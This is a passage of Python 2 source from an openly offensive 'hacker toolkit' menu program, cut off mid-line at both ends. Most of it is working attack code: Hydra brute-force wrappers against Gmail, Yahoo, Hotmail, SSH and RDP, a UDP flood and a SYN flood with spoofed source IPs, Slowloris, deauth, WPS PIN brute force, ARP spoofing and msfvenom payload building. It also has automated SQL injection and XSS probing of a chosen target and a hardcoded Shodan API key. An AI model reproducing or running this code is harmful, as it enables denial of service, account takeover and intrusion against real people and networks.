{1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", 